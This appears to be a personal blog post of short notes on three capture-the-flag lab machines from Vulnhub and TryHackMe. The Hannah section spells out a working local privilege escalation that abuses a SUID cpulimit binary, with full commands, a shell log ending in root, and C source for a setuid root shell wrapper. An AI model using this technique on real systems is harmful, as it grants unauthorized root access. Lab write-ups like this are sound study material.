Vulnhub & THM notes

Introduction

I’ve recently completed NULLY CYBERSECURITY: 1 and ONSYSTEM: SHELLDREDD #1 HANNAH from Vulnhub and Poster from TryHackMe. These are some brief thoughts about each one.

Nully

This was great; I really enjoyed it. I will probably write it up separately. But essentially it’s three separate servers/services (Mail, Web and DB) and you pivot to the Web and DB after you’ve pwned the Mail server - I did that with SSH port forwarding for the Web server. Definitely worth checking out.

Poster

This was an easy THM room; essentially it’s default creds on a web-facing postgresql installation which allows for RCE (and a shell) via Metasploit. The privesc is finding some creds in a PHP config file; pretty simple.

Hannah

So this was an SSH private key in FTP with anonymous login for the foothold; trivial. The privesc was via /usr/bin/cpulimit with the SUID bit set. GTFObins doesn’t show the method for SUID for this binary; here are two I found:

cd /tmp  
cpulimit -l 100 -f mkdir /something  
cpulimit -l 100 -f chmod 4755 /usr/bin/bash  
cpulimit -l 100 -f cp /usr/bin/bash /something  
cpulimit -l 100 -f chmod +s /something/bash  
cd /something  
./bash -p  

This is making a local copy of bash; similar techniques are shown for other SUID binaries on GTFOBins, just not for this one.

In practice, it looks like this:

hannah@ShellDredd:~/.ssh$ cd /tmp  
hannah@ShellDredd:/tmp$ cpulimit -l 100 -f mkdir /something  
Process 17132 detected  
Child process is finished, exiting...  
hannah@ShellDredd:/tmp$ cpulimit -l 100 -f chmod 4755 /usr/bin/bash  
Process 17134 detected  
Child process is finished, exiting...  
hannah@ShellDredd:/tmp$ cpulimit -l 100 -f cp /usr/bin/bash /something  
Process 17136 detected  
Child process is finished, exiting...  
hannah@ShellDredd:/tmp$ cpulimit -l 100 -f chmod +s /something/bash  
Process 17138 detected  
Child process is finished, exiting...  
hannah@ShellDredd:/tmp$ cd /something  
hannah@ShellDredd:/something ./bash -p  
bash-5.0# whoami  
root  

The second method is making a SUID binary of our own and then running it via cpulimit. The binary looks like this:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
	setuid(0), setgid(0); system("/bin/bash");
}

There are other variants of this code, but it’s essentially setuid to zero and call bash (or a reverse shell). There is no compiler on the box so you have to compile it on your attack machine and upload the binary. Then you can run:

hannah@ShellDredd:~/.ssh$ cpulimit -l 95 -f ./shell

Apart from this slightly different SUID binary, it’s fairly simple.